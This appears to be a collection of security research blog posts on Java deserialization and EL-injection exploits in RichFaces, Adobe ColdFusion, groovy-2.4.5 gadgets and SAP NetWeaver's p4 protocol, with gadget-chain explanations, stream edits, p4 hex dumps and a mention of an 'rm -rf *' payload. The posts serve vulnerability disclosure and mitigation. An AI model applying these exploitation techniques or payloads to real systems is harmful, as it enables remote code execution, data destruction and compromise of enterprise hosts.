The RichFaces issue RF-13977 corresponding to this vulnerability is public and actually quite detailed. It describes that the RichFaces Showcase application utilizes the MediaOutputResource dynamic resource builder. The data object passed in the do URL parameter holds the state object, which is used by MediaOutputResource.restoreState(FacesContext, Object) to restore its state. This includes the contentProducer field, which is expected to be a MethodExpression object. That MethodExpression later gets invoked by MediaOutputResource.encode(FacesContext) to pass execution to the referenced method to generate the resource's contents. In the mentioned example, the EL method expression #{mediaBean.process} references the process method of a Java Bean named mediaBean.

Now the problem with that is that the EL expression can be changed, even just with basic Linux utilities. There is no protection in place that would prevent one from tampering with it. Depending on the EL implementation, this allows arbitrary code execution, as demonstrated by the reporter:

However, exploitation of this vulnerability is not always that easy. Especially if there is no existing sample of a valid do state object that can be tampered with. Because if one would want to create the state object, it would require the use of compatible libraries, otherwise the deserialization may fail. Moreover, the EL implementation does not allow arbitrary expressions with parameterized invocations in method expressions as this has only just been added in EL 2.2. EL exploitation is quite an interesting topic in itself.

The patch for this issue introduced in RichFaces 4.5.4 was to check the expression of the contentProducer whether it contains a parenthesis. This would prevent the invocation of methods with parameters like loadClass("java.lang.Runtime").

The Present

The kind of the past vulnerabilities led to the assumption that there may be a way to bypass the mitigations. And after some research, two ways were found to gain remote code execution in a similar manner also affecting the latest RichFaces versions 3.3.4 and 4.5.17:

RF-14310: Arbitrary EL Evaluation in RichFaces 3.x ≤ 3.3.4
Injection of arbitrary EL expressions allows remote code execution via org.richfaces.renderkit.html.Paint2DResource.
RF-14309: Arbitrary EL Evaluation in RichFaces 4.5.3 ≤ 4.5.17
Injection of arbitrary EL variable mapper allows to bypass mitigation of CVE-2015-0279 and thereby remote code execution.

Although the issues RF-14309 and RF-14310 were discovered in the order of their identifier, we'll explain them in the opposite order. Also note that the issues are not public but only visible to persons responsible to resolve security issues.

RF-14310: Arbitrary EL Evaluation

This vulnerability is very similar to CVE-2015-0279/RF-13799. While the injection of arbitrary EL expressions was possible right from the beginning, there is always a need to get them triggered somehow. This similarity was found in the org.richfaces.renderkit.html.Paint2DResource class. When a resource of that type gets requested, its send(ResourceContext) method gets called. The resource data transmitted in the request must be an org.richfaces.renderkit.html.Paint2DResource$ImageData object. This passes the whitelisting as ImageData extends org.ajax4jsf.resource.SerializableResource, which actually was introduced in 3.3.4 to fix the Java deserialization vulnerability.

RF-14309: Arbitrary EL Evaluation

As the patch to CVE-2015-0279 introduced in 4.5.4 disallowed the use of parenthesis in the EL method expression of the contentProducer, it seemed like a dead end. But if you are fimilar with EL internals, you would know that they can have custom function mappers and variable mappers, which are used by the ELResolver to resolve functions (i. e., name in ${prefix:name()}) and variables (i. e., var in ${var.property}) to Method and ValueExpression instances respectively. Fortunately, various VariableMapper implementations were added to the whitelist starting with 4.5.3.[5]

So to exploit this, all that is needed is to use a variable in the contentProducer method expression like ${dummy.toString} and add an appropriate VariableMapper to the method expression that maps dummy to a ValueExpression of your choice.

The Future

RichFaces has reached its end-of-life in June 2016 and their RichFaces End-Of-Life Questions & Answers is pretty clear on the time thereafter:

What will happen if a serious bug or security issue is discovered in the future?

There will be no patches after the end of support. In case of discovering a serious issue you will have to develop a patch yourself or switch to another framework.

RichFaces End-Of-Life Questions & Answers

So we can't expect official patches.

The Bonus

While looking for ways to exploit the recent versions of RichFaces, there were two classes in the JSF API 2.0 and later, which seemed promising:

The interesting thing about these classes is that they have a equals(Object) method, which eventually calls getType(ELContext) on a EL value expression. For example, if equals(Object) gets called on a ValueExpressionValueBindingAdapter object with a ValueExpression object as other, getType(ELContext) of other gets called. And as the value expression has to be evaluated to determine its resulting type, this can be used as a Java deserialization primitive to execute EL value expressions on deserialization.

This is very similar to the Myfaces1 and Myfaces2 gadgets in ysoserial.[6] However, while they require Apache MyFaces, this one is independent from the JSF implementation and only requires a matching EL implementation.

Unfortunately, this gadget does not work for RichFaces. The reason for that is that ValueExpressionValueBindingAdapter needs to have a valid value binding as getType(ELContext) gets called first. But javax.faces.el.ValueBinding is not whitelisted. And wrapping it in a StateHolderSaver does not work because the state object is of type Object[] and therefore the cast to Serializable[] in StateHolderSaver.restore(FacesContext) fails.[7] This is probably a bug in RichFaces as Serializable[] is not whitelisted either although StateHolderSaver uses Serializable[] internally on StateHolder instances.

Conclusion

It has been shown that all RichFaces versions 3.x and 4.x including the latest 3.3.4 and 4.5.17 are exploitable by one or multiple vulnerabilities:

  • RichFaces 3
    • 3.1.0 ≤ 3.3.3: CVE-2013-2165
    • 3.1.0 ≤ 3.3.4: RF-14310
  • RichFaces 4
    • 4.0.0 ≤ 4.3.2: CVE-2013-2165
    • 4.0.0 ≤ 4.5.4: CVE-2015-0279
    • 4.5.3 ≤ 4.5.17: RF-14309

As we can't expect official patches, one way to mitigate all these vulnerabilities is to block requests to the concerned URLs:

  • Blocking requests of URLs with paths containing /DATA/ should mitigate CVE-2013-2165 and RF-14310.
  • Blocking requests of URLs with paths containing org.richfaces.resource.MediaOutputResource (literally or URL encoded) should mitigate CVE-2015-0279 and RF-14309.

Exploiting Adobe ColdFusion before CVE-2017-3066

By: Unknown
13 March 2018 at 14:41
In a recent penetration test my teammate Thomas came across several servers running Adobe ColdFusion 11 and 12. Some of them were vulnerable to CVE-2017-3066 but no outgoing TCP connections were possible to exploit the vulnerability. He asked me whether I had an idea how he could still get a SYSTEM shell and the outcome of the short research effort is documented here.

Introduction Adobe ColdFusion & AMF

Before we go into technical details, I will give you a short intro to Adobe ColdFusion (CF). Adobe ColdFusion is an Application Development Platform like ASP.net, however several years older. Adobe ColdFusion allows a developer to build websites, SOAP and REST web services and interact with Adobe Flash using the Action Message Format (AMF).

The AMF protocol is a custom binary serialization protocol. It has two formats, AMF0 and AMF3. An Action Message consists of headers and bodies. Several data types are supported in AMF0 and AMF3. For example the AMF3 format supports the following protocol elements with their type identifier:
Details about the binary message formats of AMF0 and AMF3 can be found on Wikipedia (see https://en.wikipedia.org/wiki/Action_Message_Format).
There are several implementations for AMF in different languages. For Java we have Adobe BlazeDS (now Apache BlazeDS), which is also used in Adobe ColdFusion.
The BlazeDS AMF serializer can serialize complex object graphs. The serializer starts with the root object and serializes its members recursively.
Two general serialization techniques are supported by BlazeDS to serialize complex objects:
  1. Serialization of Bean Properties (AMF0 and AMF3)
  2. Serialization using Java's java.io.Externalizable interface. (AMF3)

Serialization of Bean Properties

This technique requires the object to be serialized to have a public no-arg constructor and for every member public Getter-and Setter-Methods (JavaBeans convention).
In order to collect all member values of an object, the AMF serializer invokes all Getter-methods during serialization. The member names and values are put in the Action message body with the class name of the object.
During deserialization, the classname is taken from the Action Message, a new object is constructed and for every member name the corresponding set method is called with the value as argument. This all happens either in method readScriptObject() of class flex.messaging.io.amf.Amf3Input or readObjectValue() of class flex.messaging.io.amf.Amf0Input.

Serialization using Java's java.io.Externalizable interface

BlazeDS further supports serialization of complex objects of classes implementing the java.io.Externalizable interface which inherits from java.io.Serializable.
Every class implementing this interface needs to provide its own logic to deserialize itself by calling methods on the java.io.ObjectInput-implementation to read serialized primitive types and Strings (e.g. method read(byte[] paramArrayOfByte)).
During deserialization of an object (type 0xa) in AMF3, the method readScriptObject() of class flex.messaging.io.amf.Amf3Input gets called. In line #759 the method readExternalizable is invoked which calls the readExternal() method on the object to be deserialized.

This should be sufficient to serve as an introduction to Adobe ColdFusion and AMF.

Previous work

Chris Gates (@Carnal0wnage) published the paper ColdFusion for Pentesters which is an excellent introduction to Adobe ColdFusion.
Wouter Coekaerts (@WouterCoekaerts) already showed in his blog post that deserializing untrusted AMF data is dangerous.
Looking at the history of Adobe ColdFusion vulnerabilities at Flexera/Secunia's database you can find mostly XSS', XXE's and information disclosures.
The most recent ones are:
  • Deserialization of untrusted data over RMI (CVE-2017-11283/4 by @nickstadb)
  • XXE (CVE-2017-11286 by Daniel Lawson of @depthsecurity)
  • XXE (CVE-2016-4264 by @dawid_golunski)

CVE-2017-3066

In 2017 Moritz Bechler of AgNO3 GmbH and my teammate Markus Wulftange discovered independently the vulnerability CVE-2017-3066 in Apache BlazeDS.
The core problem of this vulnerability was that Adobe Coldfusion never did any whitelisting of allowed classes. Thus any class in the classpath of Adobe ColdFusion, which either fulfills the Java Beans Convention or implements java.io.Externalizable could be sent to the server and get deserialized. Both Moritz and Markus found JRE classes (sun.rmi.server.UnicastRef2 sun.rmi.server.UnicastRef) which implemented the java.io.Externalizable interface and triggered an outgoing TCP connection during AMF3 deserialization. After the connection was made to the attacker's server, its response was deserialized using Java's native deserialization using ObjectInputStream.readObject(). Both found a great "bridge" from AMF deserialization to Java's native deserialization which offers well known exploitation primitives using public gadgets. Details about the vulnerability can also be found in Markus' blog post.
Apache introduced validation through the class flex.messaging.validators.ClassDeserializationValidator. It has a default whitelist but can also be configured with a configuration file. For details see the Apache BlazeDS release notes.

Finding exploitation primitives before CVE-2017-3066

As already mentioned in the very beginning my teammate Thomas required an exploit which also works without outgoing connection.
I had a quick look into the excellent research paper "Java Unmarshaller Security" of Moritz Bechler where he analysed several "Unmarshallers" including BlazeDS. The exploitation payloads he discovered weren't applicable since the libraries were missing in the classpath.
So I started with my typical approach, fired up my favorite "reverse engineering tool" when it comes to Java, Eclipse. Eclipse together with the powerful decompiler plugin "JD-Eclipse" (https://github.com/java-decompiler/jd-eclipse) is all you need for static and dynamic analysis. As a former Dev I was used to work with IDE's which make your life easier and decompiling and grepping through code is often very inefficient and error prone. So I created a new Java project and added all jar-files of Adobe Coldfusion 12 as external libraries.
The first idea was to look for further calls to Java's ObjectInputStream.readObject-method. Using Eclipse this is very easy. Just open class ObjectInputStream, right click on the readObject() method and click "Open Call Hierarchy". Thanks to JD-Eclipse and its decompiler, Eclipse is able to construct call graphs based on class information without having any source. The call graph looks big in the very beginning. But with some experience you see very quickly which nodes in the graph are interesting.
After some hours I found two promising call graphs.

Setter-based Exploit

The first one starts with method setState(byte[] new_state) of class org.jgroups.blocks.ReplicatedTree.



Looking at the implementation of this method, we already can imagine what is happening in line #605. A quick look at the call graph confirms that we eventually end up in a call to ObjectInputStream.readObject().

The only thing to mention here is that the byte[] passed to setState() needs to have an additional byte 0x2 at offset 0x0 as we can see from line 364 of class org.jgroups.util.Util.
The exploit can be found in the following image.

The exploit works against Adobe ColdFusion 12 only since JGroups is only available in this specific version.

Externalizable-based Exploit

The second call graph starts in class org.apache.axis2.util.MetaDataEntry with a call to readExternal which is what we are looking for.

In line #297 we have a call to SafeObjectInputStream.install(inObject).
In this function our AMF3Input instance gets wrapped by a org.apache.axis2.context.externalize.SafeObjectInputStream instance.
In line #341 a new instance of class org.apache.axis2.context.externalize.ObjectInputStreamWithCL is created. This class just extends the standard java.io.ObjectInputStream. In line #342 we finally have our call to readObject().
The following image shows the request for the exploit.


The exploit works against Adobe ColdFusion 11 and 12.

ColdFusionPwn

To make your life easier I created the simple tool ColdFusionPwn. It works on the command line and allows you to generate the serialized AMF message. It incorporates Chris Frohoff's ysoserial for gadget generation. It can be found on our github.

Takeaways

Deserializing untrusted input is bad, that's for sure. From an exploiters perspective exploiting deserialization vulnerabilities is a challenging task since you need to find the "right" objects (gadgets) which trigger functionality you can reuse for exploitation. But it's also more fun :-)

By the way: If you want to make a deep dive into serverside Java Exploitation and all sorts of deserialization vulnerabilities and how to do proper static and dynamic analysis in Java, you might be interested in our upcoming "Advanced Java Exploitation" course.

Handcrafted Gadgets

18 January 2018 at 15:07

Introduction

In Q4 2017 I was pentesting a customer. Shortly before, I had studied json attacks when I stumbled over an internet-facing B2B-portal-type-of-product written in Java they were using (I cannot disclose more details due to responsible disclosure). After a while, I found that one of the server responses sent a serialized Java object, so I downloaded the source code and found a way to make the server deserialize untrusted input. Unfortunately, there was no appropriate gadget available. However, they are using groovy-2.4.5 so when I saw [1] end of december on twitter, I knew I could pwn the target if I succeeded to write a gadget for groovy-2.4.5. This led to this blog post which is based on work by Sam Thomas [2], Wouter Coekaerts [3] and Alvaro Muñoz (pwntester) [4].

Be careful when you fix your readObject() implementation...

We'll start by exploring a popular mistake some developers made during the first mitigation attempts, after the first custom gadgets surfaced after the initial discovery of a vulnerability. Let's check out an example, the Jdk7u21 gadget. A brief recap of what it does: It makes use of a hashcode collision that occurs when a specially crafted instance of java.util.LinkedHashSet is deserialized (you need a string with hashcode 0 for this). It uses a java.lang.reflect.Proxy to create a proxied instance of the interface javax.xml.transform.Templates, with sun.reflect.annotation.AnnotationInvocationHandler as InvocationHandler. Ultimately, in an attempt to determine equality of the provided 2 objects the invocation handler calls all argument-less methods of the provided TemplatesImpl class which yields code execution through the malicious byte code inside the TemplatesImpl instance. For further details, check out what the methods AnnotationInvocationHandler.equalsImpl() and TemplatesImpl.newTransletInstance() do (and check out the links related to this gadget).
The following diagram, taken from [5], depicts a graphical overview of the architecture of the gadget.

So far, so well known.
In recent Java runtimes, there are in total 3 fixes inside AnnotationInvocationHandler which break this gadget (see epilogue). But let's start with the first and most obvious bug. The code below is from AnnotationInvocationHandler in Java version 1.7.0_21:

There is a try/catch around an attempt to get the proxied annotation type. But the proxied interface javax.xml.transform.Templates is not an annotation. This constitutes a clear case of potentially dangerous input that would need to be dealt with. However, instead of throwing an exception there is only a return statement inside the catch-branch. Fortunately for the attacker, the instance of the class is already fit for purpose and does not need the rest of the readObject() method in order to be able to do its malicious work. So the "return" is problematic and would have to be replaced by a throw new Exception of some sort.
Let's check how this method looks like in Java runtime 1.7.0_80:

Ok, so problem fixed? Well, yes and no. On the one hand, the use of the exception in the catch-clause will break the gadget which currently ships with ysoserial. On the other hand, this fix is a perfect example of the popular mistake I'm talking about. Wouter Coekaerts (see [3]) came up with an idea how to bypass such "fixes" and Alvaro Muñoz (see [4]) provided a gadget for JRE8u20 which utilizes this technique (in case you're wondering why there is no gadget for jdk1.7.0_80: 2 out of the total 3 fixes mentioned above are already incorporated into this version of the class. Even though it is possible to bypass fix number one, fix number two would definitely stop the attack).
Let's check out how this bypass works in detail.

A little theory

Let's recap what the Java (De-)Serialization does and what the readObject() method is good for. Let's take the example of java.util.HashMap. An instance of it contains data (key/value pairs) and structural information (something derived from the data) that allows logarithmic access times to your data. When serializing an instance of java.util.HashMap it would not be wise to fully serialize its internal representation. Instead it is completely sufficient to only serialize the data that is required to reconstruct its original state: Metadata (loadfactor, size, ...) followed by the key/value pairs as flat list. Let's have a look at the code:

As you can see, the method starts with a call to defaultReadObject. After that, the instance attributes loadFactor and threshold are initialized and can be used. The key/value pairs are located at the end of the serialized stream. Since the key/value pairs are contained as an unstructured flat list in the stream calling putVal(key,value) basically restores the internal structure, what allows to efficiently use them later on.
In general, it is fair to assume that many readObject() methods look like this:

Coming back to AnnotationInvocationHandler, we can see that its method readObject follows this pattern. Since the problem was located in the custom code section of the method, the fix was also applied there. In both versions, ObjectInputStream.defaultReadObject() is the first instruction. Now let's discuss why this is a problem and how the bypass works.

Handcrafted Gadgets

At work we frequently use ysoserial gadgets. I suppose that many readers are probably familiar with the ysoserial payloads and how these are created. A lot of Java reflection, a couple of fancy helper classes doing stuff like setting Fields, creating Proxy and Constructor instances. With "Handcrafted Gadgets" I meant gadgets of a different kind. Gadgets which cannot be created in the fashion ysoserial does (which is: create an instance of a Java object and serialize it). The gadgets I'm talking about are created by compiling a serialization stream manually, token by token. The result is something that can be deserialized but does not represent a legal Java class instance. If you would like to see an example, check out Alvaro's JRE8_20 gadget [4]. But let me not get ahead of myself, let's take a step back and focus on the problem I mentioned at the end of the last paragraph. The problem is that if the developer does not take care when fixing the readObject method, there might be a way to bypass that fix. The JRE8_20 gadget is an example of such a bypass. The original idea was, as already mentioned in the introduction, first described by Wouter Coekaerts [2]. It can be summarized as follows:

Idea

The fundamental insight is the fact that many classes are at least partly functional when the default attributes have been instantiated and propagated by the ObjectInputStream.defaultReadObject() method call. This is the case for AnnotationInvocationHandler (in older Java versions, more recent versions don't call this method anymore). The attacker does not need the readObject to successfully terminate, an object instance where the method ObjectInputStream.defaultReadObject() has executed is perfectly okay. However, it is definitely not okay from an attacker's perspective if readObject throws an exception, since, eventually this will break deserialization of the gadget completely. The second very important detail is the fact that if it is possible to suppress somehow the InvalidObjectException (to stick with the AnnotationInvocationHandler example) then it is possible to access the instance of AnnotationInvocationHandler later through references. During the deserialization process ObjectInputStream keeps a cache of various sorts of objects. When AnnotationInvocationHandler.readObject is called an instance of the object is available in that cache.
This brings the number of necessary steps to write the gadget down to two. Firstly, store the AnnotationInvocationHandler in the cache by somehow wrapping it such that the exception is suppressed. Secondly, build the original gadget, but replace the AnnotationInvocationHandler in it by a reference to the object located in the cache.

Now let's step through the detailed technical explanation.
  1. References
  2. The wrapper class: BeanContextSupport
  3. The cache

References

If one thinks about object serialization and the fact that you can nest objects recursively it is clear that something like references must exist. Think about the following construct:
Here, the attribute a of class instance c points to an existing instance already serialized before and the serialized stream must reflect this somehow. When you look at a serialized binary stream you can immediately see the references: The hex representation usually looks like this:
71 00 7E AB CD
where AB CD is a short value which represents the array index of the referenced object in the cache. You can easily spot references in the byte stream since hex 71 is "q" and hex 7E is "~":


The wrapper class: BeanContextSupport

Wouter Coekaerts found the class java.beans.beancontext.BeanContextSupport. At some point during deserialization it does the following:
continue in the catch-branch, exactly what we need. So if we can build a serialized stream with an AnnotationInvocationHandler as first child of an instance of BeanContextSupport during deserialization we will end up in the catch (IOException ioe) branch and deserialization will continue.
Let's test this out. I will build a serialized stream with an illegal AnnotationInvocationHandler in it ("illegal" means that the type attribute is not an annotation) and we will see that the stream deserializes properly without throwing an exception. Here is what the structure of this stream will look like:
Once done, the deserialized object is a HashMap with one key/value pair, key is an instance of BeanContextSupport, value is "whatever".
Click here to see the code on github.com
You need to build Alvaro's project [6] to get the jar file necessary for building this:
kai@CodeVM:~/eworkspace/deser$ javac -cp /home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar BCSSerializationTest.java
kai@CodeVM:~/eworkspace/deser$ java -cp .:/home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar BCSSerializationTest > 4blogpost
Writing java.lang.Class at offset 1048
Done writing java.lang.Class at offset 1094
Writing java.util.HashMap at offset 1094
Done writing java.util.HashMap at offset 1172
Adjusting reference from: 6 to: 8
Adjusting reference from: 6 to: 8
Adjusting reference from: 8 to: 10
Adjusting reference from: 9 to: 11
Adjusting reference from: 6 to: 8
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 17 to: 19
Adjusting reference from: 17 to: 19
kai@CodeVM:~/eworkspace/deser$

A little program that deserializes the created file and prints out the resulting object shows us this:
kai@CodeVM:~/eworkspace/deser$ java -cp ./bin de.cw.deser.Main deserialize 4blogpost
{java.beans.beancontext.BeanContextSupport@723279cf=whatever}

This concludes the first part, we successfully wrapped an instance of AnnotationInvocationHandler inside another class such that deserialization completes successfully.

The cache

Now we need to make that instance accessible. First we need to get hold of the cache. In order to do this, we need to debug. We set a breakpoint at the highlighted line in java.util.HashMap:
Then start the deserializer program and step into readObject:


When we open it we can see that number 24 is what we were looking for.


Here is one more interesting thing: If you deserialize with an older patch level of the Java Runtime, the object is initialized as can be seen in the sceenshot below:


If you use a more recent patch level like Java 1.7.0_151 you will see that the attributes memberValues and type are null. This is the effect of the third improvement in the class I've been talking about before. More recent versions don't call defaultReadObject at all, anymore. Instead, they first check if type is an annotation type and only after that they populate the default fields.
Let's do one more little exercise. In the program above in line 150, change

        TC_STRING,
        "whatever",

to
        TC_REFERENCE,
        baseWireHandle + 24,

and run the program again:
kai@CodeVM:~/eworkspace/deser$ java -cp ./bin de.cw.deser.Main deserialize 4blogpost2
{java.beans.beancontext.BeanContextSupport@723279cf=sun.reflect.annotation.AnnotationInvocationHandler@10f87f48}

As you can see, the entry in the handles table can easily be referenced.
Now we'll leave the Jdk7u21 gadget and AnnotationInvocationHandler and build a gadget for groovy 2.4.5 using the techniques outlined above.

A deserialization gadget for groovy-2.4.5

Based on an idea of Sam Thomas (see [2]).
The original gadget for version 2.3.9 looks like this:
Trigger is readObject of our beloved AnnotationInvocationHandler, it will call entrySet of the memberValues hash map, which is a proxy class with invocation handler of type org.codehaus.groovy.runtime.ConvertedClosure. Now every invocation of ConvertedClosure will be delegated to doCall of the nested instance of MethodClosure which is a wrapper of the call to the groovy function execute. The OS command that will be executed is provided as member attribute to MethodClosure.
After the original gadget for version 2.3.9 showed up MethodClosure was fixed by adding a method readResolve to the class org.codehaus.groovy.runtime.MethodClosure:
If the global constant ALLOW_RESOLVE is not set to true an UnsupportedOperationException is supposed to break the deserialization. Basically, this means that an instance of MethodClosure cannot be deserialized anymore unless one explicitely enables it. Let's quickly analyze MethodClosure: The class does not have a readObject method and readResolve is called after the default built-in deserialization. So when readResolve throws the exception the situation is almost identical to the one explained in the above paragraphs: An instance of MethodClosure is already in the handle table. But there is one important difference: AnnotationInvocationHandler throws an InvalidObjectException which is a child of IOException whereas readResolve throws an UnsupportedOperationException, which is a child of RuntimeException. BeanContextSupport, however, only catches IOException and ClassCastException. So the identical approach as outlined above would not work: The exception would not be caught. Fortunately, in late 2016 Sam Thomas found the class sun.security.krb5.KRBError which in its readObject method transforms every type of exception into IOException:
This means if we put KRBError in between BeanContextSupport and MethodClosure the UnsupportedOperationException will be translated into IOException which is ultimately caught inside the readChildren method of BeanContextSupport. So our wrapper construct looks like this:
Some readers might be confused by the fact that you can nest an object of type MethodClosure inside a KRBError. Looking at the code and interface of the latter, there is no indication that this is possible. But it is important to keep in mind that what we are concerned with here are not Java objects! We are dealing with a byte stream that is deserialized. If you look again at the readObject method of KRBError you can see that this class calls ObjectInputStream.readObject() right away. So here, every serialized Java object will do fine. Only the cast to byte array will throw a ClassCastException, but remember: An exception will be thrown already before that and this is perfectly fine with the design of our exploit.
Now it is time to put the pieces together. The complete exploit consists of a hash map with one key/value pair, the BeanContextSupport is the key, the groovy gadget is the value. [1] suggests putting the BeanContextSupport inside the AnnotationInvocationHandler but it has certain advantages for debugging to use the hash map. Final structure looks like this:
The final exploit can be found on github.com.

Epilogue

I had mentioned 3 improvements in AnnotationInvocationHandler but I only provided one code snippet. For the sake of completeness, here are the two:
The second fix in jdk1.7.0_80 which already breaks the jdk gadget is a check in equalsImpl:
The highlighted check will filter out the methods getOutputProperties and newTransformer of TemplatesImpl because they are not considered annotation methods, and getMemberMethods returns an empty array so the methods of TemplatesImpl are never called and nothing happens. The third fix which you can find for example in version 1.7.0_151 finally fixes readObject:
As one can see, only the 2 last calls actually set the member attributes type and memberValues. defeaultReadObject is not used at all. Before, the type check for the annotation class is performed. If it fails, an InvalidObjectException is thrown and type and memberValues remain null.

References

  1. https://www.thezdi.com/blog/2017/12/19/apache-groovy-deserialization-a-cunning-exploit-chain-to-bypass-a-patch
  2. http://www.zerodayinitiative.com/advisories/ZDI-17-044/
  3. http://wouter.coekaerts.be/2015/annotationinvocationhandler
  4. https://github.com/pwntester/JRE8u20_RCE_Gadget/blob/master/src/main/java/ExploitGenerator.java
  5. https://gist.github.com/frohoff/24af7913611f8406eaf3
  6. https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/Groovy1.java

SAP Customers: Make sure your SAPJVM is up to date!

17 May 2017 at 14:56

Summary

Code White have already an impressive publication record on Java Deserialization. This post is dedicated to a vulnerability in SAP NetWeaver Java. We could reach remote code execution through the p4 protocol and the Jdk7u21 gadget with certain engines and certain versions of the SAP JVM.

We would like to emphasize the big threat unauthenticated RCE poses to a SAP NetWeaver Java. An attacker with a remote shell can read out the secure storage, access the database, create a local NetWeaver user with administrative privileges, in other words, fully compromise the host. Unfortunately, this list is far from being complete. An SAP landscape is usually a network of tightly
connected servers and services. It wouldn’t be unusual that the database of the server stores technical users with high privileges for other SAP systems, be it NetWeaver ABAP or others. Once the attacker gets hold of credentials for those users she can extend her foothold in the organization and eventually compromise the entire SAP landscape.

We tested our exploit successfully on 7.20, 7.30 and 7.40 machines, for detailed version numbers see below. When contacted, SAP Product Security Response told us they published 3 notes (see [7], [8] and [9]) about updates fixing the problems (already in June 2013) with SAP JVM versions 1.5.0_086, 1.6.0_052 and 1.7.0_009 (we tested on earlier versions, see below). In addition SAP have recently adopted JDK JEP 290 (a Java enhancement that allows to filter incoming serialized data). However, neither do these three notes mention Java Deserialization nor is it obvious to the reader they relate to security in any other way.

Due to missing access to the SAP Service Marketplace we’re unable to make any statement about the aforementioned SAP JVM versions. We could only analyze the latest available SAP JVM from tools.hana.ondemand.com (see [6]) which contained a fix for the problem.

Details

In his RuhrSec Infiltrate 2016 talk, Code White’s former employee Matthias Kaiser already talked about SAP NetWeaver Java being vulnerable [2]. The work described here is completely independent of his research.
The natural entry point in this area is the p4 protocol. We found a p4 test client on SAP Collaboration Network and sniffed the traffic. One doesn’t need to wait long until a serialized object is sent over the wire:

00000000  76 31                                            v1
00000002  18 23 70 23 34 4e 6f 6e  65 3a 31 32 37 2e 30 2e .#p#4Non e:127.0.
00000012  31 2e 31 3a 35 39 32 35  36                      1.1:5925 6

    00000000  76 31 19 23 70 23 34 4e  6f 6e 65 3a 31 30 2e 30 v1.#p#4N one:10.0
    00000010  2e 31 2e 31 38 34 3a 35  30 30 30 34             .1.184:5 0004

0000001B  00 00 11 00 00 00 00 00  00 00 ff ff ff ff 00 00 ........ ........
0000002B  00 00 00 00 00 00 0a 00  63 00 6f 00 63 00 72    ........ c.o.c.r

    0000001C  00 00 75 00 00 00 ff ff  ff ff 9e 06 60 00 00 00 ..u..... ....`...
    0000002C  00 00 00 00 00 00 0b 9e  06 60 00 f7 25 e4 05 00 ........ .`..%...
    0000003C  00 00 00 00 00 00 00 98  9c 0e 2a 00 4e 00 6f 00 ........ ..*.N.o.
    0000004C  6e 00 65 00 3a 00 31 00  30 00 2e 00 31 00 30 00 n.e.:.1. 0...1.0.
    0000005C  2e 00 31 00 30 00 2e 00  31 00 30 00 3a 00 35 00 ..1.0... 1.0.:.5.
    0000006C  30 00 30 00 30 00 34 00  3a 00 4e 00 6f 00 6e 00 0.0.0.4. :.N.o.n.
    0000007C  65 00 3a 00 31 00 30 00  2e 00 30 00 2e 00 31 00 e.:.1.0. ..0...1.
    0000008C  2e 00 31 00 38 00 34 00  3a 00 35 00 30 00 30 00 ..1.8.4. :.5.0.0.
    0000009C  30 00 34                                         0.4

0000003A  00 00 16 00 00 00 9e 06  60 00 ff ff ff ff fe 00 ........ `.......
0000004A  00 00 00 00 00 00 14 00  00 00 00 00 00 00 00 00 ........ ........
0000005A  98 9c 0e 2a                                      ...*
0000005E  00 00 75 00 00 00 9e 06  60 00 ff ff ff ff 01 00 ..u..... `.......
0000006E  00 00 00 00 00 00 00 00  00 00 00 00 20 00 00 67 ........ .... ..g
0000007E  00 65 00 74 00 43 00 6c  00 61 00 73 00 73 00 42 .e.t.C.l .a.s.s.B
0000008E  00 79 00 4e 00 61 00 6d  00 65 00 28 00 6a 00 61 .y.N.a.m .e.(.j.a
0000009E  00 76 00 61 00 2e 00 6c  00 61 00 6e 00 67 00 2e .v.a...l .a.n.g..
000000AE  00 53 00 74 00 72 00 69  00 6e 00 67 00 29 00 00 .S.t.r.i .n.g.)..
000000BE  00 00 00 00 00 00 98 9c  0e 2a ac ed 00 05 74 00 ........ .*....t.
000000CE  12 43 6c 69 65 6e 74 49  44 50 72 6f 70 61 67 61 .ClientI DPropaga
000000DE  74 6f 72                                         tor
  


The highlighted part is just the java.lang.String object “ClientIDPropagator”.

Now our plan was to replace this serialized object by a ysoserial payload. Therefore, we needed to find out how the length of such a message block is encoded.

When we look at offset 0000005E, for instance, the 00 00 75 00 looks like 2 header null bytes and then a length in little endian format. Hex 75 is 117, but the total length of the last block is 8*16+3 = 131. If one looks at the blocks the client sent before (at offset 0000001B and 0000003A) one can easily spot that the real length of the block is always 14 more than what is actually sent. This lead to the first conclusion: a message block consists of 2 null bytes, 2 bytes length of the payload in little endian format, then 10 bytes of some (not understood) header information, then the payload:

When running the test client several times and by spotting the messages carefully enough one can see that the payload and header aren’t static: They use 2 4-bytes words sent in the second reply from
the server:


That was enough to set up a first small python program: Send the corresponding byte arrays in the right order, read the replies from the network, set the 4 byte words accordingly and replace “ClientIDPropagator” by the ysoserial Jdk7u21 gadget.

Unfortunately, this didn’t work out at first. A bit later we realized that SAP NetWeaver Java obviously didn’t serialize with the plain vanilla Java ObjectOutputStream but with a custom serializer. After twisting and tweaking a bit we were finally successful. Details are left to the reader ;-)

To demonstrate how dangerous this is we have published a disarmed exploit on github [5]. Instead of using a payload that writes a simple file to the current directory (e.g. cw98653.txt with contents "VULNERABLE"), like we did, an attacker can also add bytecode that runs Runtime.getRuntime().exec("rm -rf *") or establish a remote shell on the system and thereby compromise the system or in the worst case even parts of the SAP landscape.

We could successfully verify this exploit on the following systems:
  •  SAP Application Server Java 7.20 with SAPJVM 1.6.0_07 (build 007)
  •  SAP Application Server Java 7.30 with SAPJVM 1.6.0_23 (build 034)
  •  SAP Application Server Java 7.40 with SAPJVM 1.6.0_43 (build 048)
After SAP Product Security’s response, we downloaded SAPJVM 1.6.0_141 build 99 from [6] and indeed, the AnnotationInvocationHandler, which is at the core of theJdk7u21 gadget exploits, was patched. So, with that version, the JdkGadget cannot be used anymore for exploitation.

However, since staying up-to-date with modern software product release cycles is a big challenge for customers and the corresponding SAP notes do not explicitely bring the reader’s attention to a severe security vulnerability, we’d like to raise awareness that not updating the SAP JVM can expose their SAP systems to serious threats.

Mitigation

  •  Block p4 on your firewall
  •  Make sure your SAP JVM is up-to-date

References

  1. https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkinsopennms-
    and-your-application-have-in-common-this-vulnerability/
  2. http://codewhitesec.blogspot.de/2016/04/infiltrate16-slidedeck-java-deserialization.html
  3. https://github.com/frohoff/ysoserial
